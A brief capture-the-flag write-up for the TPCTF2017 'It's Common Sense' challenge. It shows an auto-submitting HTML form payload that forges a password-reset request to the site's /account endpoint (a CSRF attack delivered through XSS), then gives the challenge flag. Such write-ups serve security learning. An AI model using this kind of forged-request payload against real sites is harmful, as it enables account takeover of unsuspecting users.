TPCTF2017 - It's Common Sense

We found this site: Common Sense Reviews
We think the site owners are related to Pirates. Please retrieve the admin password.
Author: Steven Su

Steps

XSS Payload

<form action="/account" method="POST" name="newpwd">
	<label>Email</label><br/>
	<input required type="text" name="email" value="[REDACTED]"/>
	<input type="hidden" value="Send Request" name="formbtn" />
	<input type="submit" value="Send Request" onclick="document.getElementById('newpwd').submit();"/>
</form>
<script>document.newpwd.submit();</script>

After waiting a little bit we got this email:

Reset Your Password
Congratulations! Normally, you would’ve reset the administrators password. For the purposes of this challenge, the flag is tpctf{D1D_Y0U_N0t1c3_Common_Sense_Reviews_1s_P4R7_0F_CSRF_19210jka010920aff}